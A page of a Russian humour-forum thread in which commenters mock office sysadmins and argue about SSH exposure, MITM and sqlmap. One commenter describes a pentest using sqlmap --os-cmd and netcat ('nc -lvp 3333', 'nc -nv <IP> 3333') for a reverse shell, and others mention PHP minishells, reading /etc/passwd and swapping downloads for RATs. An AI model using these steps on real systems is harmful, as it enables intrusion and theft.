Кого же мы вырастили в IT - втыкателей кабелей с "танчиками", или великая сказка про русских айтишников ...


Страницы: (16) « Первая ... 7 8 [9] 10 11 ... Последняя »	[ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]

~~snegopek~~

21.03.2017 - 23:41

Статус: Offline

Приколист

Регистрация: 9.01.17
Сообщений: 346

Цитата (iobus @ 21.03.2017 - 22:48)

Цитата (snegopek @ 21.03.2017 - 22:41)

Дядя кого мы вырастили ????
То что ты тут прогнал полнейшая жесть. SSH не доступен с внешнего Ip , SSH на внешнем Ip иди умри, За такое увольняют.

Аж икнул. С домашнего IP (динамического) заходил по SSH на разные сервера, многократно, и захожу примерно раз в два-три дня :)

Проходи, мальчик :)

Икай дальше , из-за таких как ты люди бабло теряют, недоадмин. Об основах безопасности видать ты даже мельком не слышал.

[^]

~~7H21~~

21.03.2017 - 23:43

Статус: Offline

Si vis pacem, para bellum

Регистрация: 8.12.15
Сообщений: 1968

Цитата

Вы лучше пожелайте удачи парням посередине

что они будут делать при наличии X.509 сертификатов?
Или собственных сертификатов вообще?

[^]

gebs

21.03.2017 - 23:45

Статус: Offline

Ярила

Регистрация: 5.09.13
Сообщений: 4892

Цитата (iobus @ 21.03.2017 - 18:11)

Отдел IT, обслуживаем несколько крупных организаций. Самая большая - 7 этажей, до хрена компьютеров и юзеров. 5 сисадминов, у всех профильное образование в виде ВУЗа, всем или по 30, или слегка за, у всех семьи, дети, кредиты за машины, ипотеки, в общем все хотят зарабатывать (получать) как можно лучше. Получают на сеодняшний день вполне прилично.

Я уже немолодой дяденька, они мне все почти в дети годятся.

Сегодня утром звонок от одного из админов (начальник в отпуске, я как старший по званию после него, на больничном с бронхитом, но в доступе):
- Здравствуйте, ... у нас тут все корпоративные сайты перестали грузиться, ... или грузятся ... очень медленно .... Вы ничего там не делали? Тут уже начальство звонило ... (в трубке прослушивается звук игры "танчики", многоточия - это паузы, знаю, что у него стоит второй монитор, на котором круглый день играются "танчики", видимо игра отвлекает :))

Сервер свой, стоит в конторе, ничего особенного, Linux + Apache, + все что нужно, обычно работает бесперебойно, крутится сайтов около 20. Тут же пытаюсь соединиться удаленно - отказ в доступе на IP по FTP и SSH.

- Гляньте, пожалуйста, проблема кажется с вашей стороны, Вы там железо не трогали? Попробуйте сконнектиться.
- Нет, мы ... ничего не трогали (слышен звук стрельбы из танка) ... щаз ... нет, я по внутренней сети тоже сервера не вижу ...
- Попробуйте еще
- Ну вот ... я Сашу попросил ... у него тоже сервер не виден ... (Саша сидит за соседним столом, тоже весь в танчиках).

(Спуститься на этаж вниз в серверную и посмотреть, что там на сервере напрямую, видимо, не судьба, что-то не позволяет ... или не отпускает).

Вижу, что ничего хорошего не предвидится. Заползаю на сервер своими методами - вижу, что все в целом на месте (кроме пары новых вирусов :)) . Поднимаю такого же, как я , немолодого дяденьку, который у нас админ, но работает удаленно и вообще как-то на то ли пол, то ли треть ставки. Он залезает удаленно на сервер своими методами, через 5 минут сообщает - сошел с ума антиспам на почтовике, валит тонны спама и запускает какие-то процессы, в результате забито все свободное место и перегруз процессора. За почтовик с антиспамом, кстати, отвечают именно наши админы.

Минут через 30 проблема решена, антиспам поставлен в стойло, все веб сайты грузятся, почта ходит. Проблема совсем не сложная, кстати, случается уже в третий раз.

Отзваниваю админам:

- Все в порядке, все арбайтен
- А, хорошо ... (прослушиватеся звук "танчиков")
- Вы отзвонитесь, если опять что-то будет
- Да ... позвоним ... (прослушиватеся звук "танчиков")

Ну как то вызывает всякие не самые лучшие мысли. Работа сведена в втыканию проводов, если нужно, подключить кому-то принтер, вершина - это заменить жесткий диск в компутере какого-нибудь юзера и поставить Виндоуз- Офис. Все остальное - ну видимо, а ну его нах, "танчики", "танчики", "танчики" ... ну и во что-то там еще они играют, причем "командой".

Но на недостаточную зарплату и упоминание ипотек, кредитов и т.д намекают регулярно.

Что же будет дальше?

После слов "ничего особенного, Linux + Apache, + все" мне стало грустно за вашу контору)

[^]

bimb0

21.03.2017 - 23:47

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (kazanec @ 21.03.2017 - 23:35)

Возражу. Из своей практики проведения пентеста:
Сайт на PHP + PostgreSQL.
тестил все точки входа - тишина. Не нашел даже XSS.
И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный.
SQLmap с опцией --os-cmd выполнил тестовую команду id
далее было всё намного проще:
на своей машине nc -lvp 3333
на удаленной через sqlmap: nc -nv <мой_IP> 3333
и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось.
Кстати хозяин оплатил очень хорошо :)

А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.

[^]

kazanec

21.03.2017 - 23:48

Статус: Offline

Ярила

Регистрация: 20.08.12
Сообщений: 2351

Цитата (bimb0 @ 21.03.2017 - 23:47)

Цитата (kazanec @ 21.03.2017 - 23:35)

А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.

а я про что?

Цитата

--os-cmd=OSCMD Execute an operating system command

Это сообщение отредактировал kazanec - 21.03.2017 - 23:48

[^]

~~7H21~~

21.03.2017 - 23:49

Статус: Offline

Si vis pacem, para bellum

Регистрация: 8.12.15
Сообщений: 1968

Цитата

После слов "ничего особенного, Linux + Apache, + все" мне стало грустно за вашу контору)

Сказал человек, который только-что сам допустил один из самых ламерских косяков - квоттинг целого поста и ответ в одну строчку.

Что кстати не так с апачем?
Ну вот, для рядовых целей?

[^]

bimb0

21.03.2017 - 23:49

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (kazanec @ 21.03.2017 - 23:48)

а я про что?

Цитата

--os-cmd=OSCMD Execute an operating system command

Прочтите каким методом выполняются системные команды скульмапом

Цитата (7H21 @ 21.03.2017 - 23:43)

что они будут делать при наличии X.509 сертификатов?
Или собственных сертификатов вообще?

А ничего скорее всего, хотя, если очень заморочиться - можно подменить любой качаемый вами exe на RAT/HVNC и делать все, что угодно

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:51

[^]

andysh888

21.03.2017 - 23:50

Статус: Offline

Ярила

Регистрация: 20.12.11
Сообщений: 1505

Цитата (bimb0 @ 21.03.2017 - 23:35)

Вы лучше пожелайте удачи парням посередине

Что такое mitm вы можете прочитать в википедии, а как подменяются DNS и что из этого выходит вам лучше и не знать.
З.Ы. Если есть возможность - я полюзую ключи, а если есть возможность использовать еще и двухфакторку - я обязательно ей воспользуюсь

Я старый олдфаг. :)
Потому у меня все коннекты строго по IP (и срал я на DNS, да и IP все свои я помню на память) и SSH зажат строго в V2 (и на клиенте тоже не забываю ставить).

Понимаю, что это не панацея, но шансы на нормальную атаку тем же mitm - имхо, даже меньше, чем мне 6 из 45 выиграть, купив один билет за всю жизнь :). Потому как надо до икса для вклинивания в роутинг, да ещё и сеанс на открытии надо поймать. Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

[^]

kazanec

21.03.2017 - 23:52

Статус: Offline

Ярила

Регистрация: 20.08.12
Сообщений: 2351

Цитата (bimb0 @ 21.03.2017 - 23:49)

Цитата (kazanec @ 21.03.2017 - 23:48)

а я про что?

Цитата

--os-cmd=OSCMD Execute an operating system command

Прочтите каким методом выполняются системные команды скульмапом

мне не нужно читать маны sqlmap-а - это один из моих основных инструментов
Работает так, как я описал.
P.S.: Само собой на стороне сервера не винда была.

[^]

~~vkaraban~~	21.03.2017 - 23:52 [ показать ] 0
Статус: Offline Шутник Регистрация: 24.03.16 Сообщений: 89	если меня начинают затрахивать с мелкими просьбами и говорят что ты все равно на компьютере играешь - говорю идите "далеко" - не моя работа я свою сделал начинают пресовать или угрожать - сваливаю в течение года при условии помогать на предыдущей работе за тройную оплату вы не поверите - тихо мирно - никто не донимает - играю себе на компе - 500 серверов и херова туча молчаливых и согласных со всем пользователей идилия - главное тех кто мешает на компе играть послать подальше и поглубже
	[^]

bimb0

21.03.2017 - 23:52

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (andysh888 @ 21.03.2017 - 23:50)

Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

Вы правда думаете, что все делается ручками?

[^]

bimb0

21.03.2017 - 23:53

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (kazanec @ 21.03.2017 - 23:52)

Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...

[^]

kazanec

21.03.2017 - 23:54

Статус: Offline

Ярила

Регистрация: 20.08.12
Сообщений: 2351

Цитата (bimb0 @ 21.03.2017 - 23:53)

Цитата (kazanec @ 21.03.2017 - 23:52)

Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...

Из вашего же примера:

Цитата

sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

[^]

NMNH	21.03.2017 - 23:54 [ показать ] 0
Статус: Offline Ярила Регистрация: 9.08.13 Сообщений: 6054	Закончится все это как всегда - наступит кризис и всех этих "танкистов" выкинут нахер на мороз как лишнее звено и, чсх, даже не заметят разницы. А они в свою очередь придут на ЯП и будут ныть "как все в стране херово, даже вот таких великих специалистов (тут не будет уточняться в чем) сократили и оставили без хлеба и ипотеки. Страна катится в г-но, все ужасно, везде распилы и безблагодатность" - в общем будет очередная порция говноедских постов, чтобы оправдать собственную уебищность и не признать собственных ошибок. Упс, смотрю тут уже перешли в прикладную айти фаллометрию, а я все первый пост комментирую. Пардон, не буду мешать. ) Это сообщение отредактировал NMNH - 22.03.2017 - 00:02
	[^]

andysh888

21.03.2017 - 23:55

Статус: Offline

Ярила

Регистрация: 20.12.11
Сообщений: 1505

Цитата (bimb0 @ 21.03.2017 - 23:52)

Цитата (andysh888 @ 21.03.2017 - 23:50)

Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

Вы правда думаете, что все делается ручками?

Я знаю сколько стоят ботнеты :)

[^]

bimb0

21.03.2017 - 23:56

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (kazanec @ 21.03.2017 - 23:54)

Из вашего же примера:

Цитата

sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

Ну а я про что?

Заливается файл с расширением пхп и минишеллом внутри, нельзя системные команды в никсах через sql-inj выполнять, можно только записать произвольные данные в файл (если file_priv=y, нет кавычек и дира позволяет в себя писать+ доступна из веба).

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:57

[^]

~~xMSEx~~

21.03.2017 - 23:56

Статус: Offline

ln -s /dev/ass /dev/hands

Регистрация: 13.03.13
Сообщений: 2564

Цитата (bimb0 @ 21.03.2017 - 22:41)

Цитата (xMSEx @ 21.03.2017 - 22:39)

Вполне себе можно добиться выполнения произвольных команд от юзера приложения, можно по бд пошариться. Есть разные варианты.

Нука пример?

Никаких "произвольных команд", при sql-inj вы можете использовать только sql (и то сильно ограниченно) какой там exec, да тем более через тот же sеlесt

как тебе вариант выполнения запроса, который отдает в ответе строку кода, который выполняется внутри приложения если нет четких критериев обработки ответа? и не надо мне говорить, что это не работает, это прекрасно работает. тот же селект, который вернет в ответе, для примера exec(/bin/cat /etc/passwd); который будет обработан php...

[^]

~~7H21~~

21.03.2017 - 23:58

Статус: Offline

Si vis pacem, para bellum

Регистрация: 8.12.15
Сообщений: 1968

Цитата

можно подменить любой качаемый вами exe на RAT/HVNC

ну мне сложно представить конкретно в моём случае такую ситуацию.
Разве-что как-то очень сложным путем репозиторий дебиана например подменить...

Да и активность на левых портах отслеживается постоянно.
Ну и процессы можно подписывать, если паранойя :))

[^]

bimb0

21.03.2017 - 23:59

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (xMSEx @ 21.03.2017 - 23:56)

Фантазер

Чтобы любой код из базы вполнился необходимо засунуть его в хотя бы в эвал, любо в коллбэк-функции.
и будет это уже не sql-inj, а php-inj/code exec из-за недостаточной фильтрации данных

[^]

~~xMSEx~~

21.03.2017 - 23:59

Статус: Offline

ln -s /dev/ass /dev/hands

Регистрация: 13.03.13
Сообщений: 2564

Цитата (bimb0 @ 21.03.2017 - 22:50)

Цитата (iobus @ 21.03.2017 - 22:48)

Ага, только не ты 1 это можешь сделать

Хоть по серту, али логин+пасс?

Или про ssh-bruteforce не слышалис?

у меня с брутом отлично справляется fail2ban, как вариант

[^]

Карлсончег	21.03.2017 - 23:59 [ показать ] 0
Статус: Offline Ярила Регистрация: 13.03.09 Сообщений: 4453	Лол. Если только такая мелкая хрень случилась, а всё остальное работает - это хороший показатель работы. В жопу компы. Как мы с програмером внедряли УПП + кучу новых серваков на разрозненных территориально предприятиях - это жопа. При этом куча других проблем вялотекущих. Короче, врагу не пожелаешь. А раньше был только ADSL. По удалёнке плохо было.
	[^]

~~7H21~~

22.03.2017 - 00:00

Статус: Offline

Si vis pacem, para bellum

Регистрация: 8.12.15
Сообщений: 1968

Цитата

коннекты строго по IP (и срал я на DNS, да и IP все свои я помню на память) и SSH зажат строго в V2

Ну это вообще азы...

[^]

~~Craig~~

22.03.2017 - 00:00

Статус: Offline

Ярила

Регистрация: 10.08.12
Сообщений: 3147

Цитата (base64 @ 21.03.2017 - 21:10)

Цитата

Это просто праздник какой-то. А зачем у вас там nginx если все на апаче? cry.gif

З.Ы. Ты точно админ а не тупо выдумал котоламповую историю порубать чуток юкки на теме "молодежь нынче ну тупаааая!" gigi.gif

Ты погоди, щас окажется, что нжинкс просто стоит на гейтвее вместе с задроченным варнишем для кэширования, за ним фронт-энды на апачах, редисы-хуедисы, мэмкэши, и вместо БД галерный кластер. И все это стараниями нашего покорного слуги ТСа.

Хм. А фалькона у вас там нет случайно?

[^]

kazanec

22.03.2017 - 00:00

Статус: Offline

Ярила

Регистрация: 20.08.12
Сообщений: 2351

Цитата (bimb0 @ 21.03.2017 - 23:56)

Цитата (kazanec @ 21.03.2017 - 23:54)

Из вашего же примера:

Цитата

sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

Ну а я про что?

Пиздец.
Теоретик спорит с практиком )))))))
Генерится пейлоад, далее он заливается (перед этим всем, если не включена опция batch будут вопросы по языку программирования на аткуемой стороне, платформе 32/64) -> _исполняется_заданная_команда_которая находится_в_пейлоаде_

Не надо глупости нести.

[^]

bimb0

22.03.2017 - 00:02

Статус: Offline

МимоКрокодил (c)

Регистрация: 25.03.16
Сообщений: 6080

Цитата (kazanec @ 22.03.2017 - 00:00)

Слушай, практик, давай уже пример, скульмап запустить много мозга не надо, ты лучше расскажи как генерится пейлод, как полезная нагрузка попадает на атакуемую машину и как, а главное кем, интепретируется

Цитата (7H21 @ 21.03.2017 - 23:58)

А у вас репы айпишниками прописаны или доменами?

Если второе, то подмена DNS все решит

Это сообщение отредактировал bimb0 - 22.03.2017 - 00:06

[^]

Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.

1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)	Просмотры темы: 75436
0 Пользователей: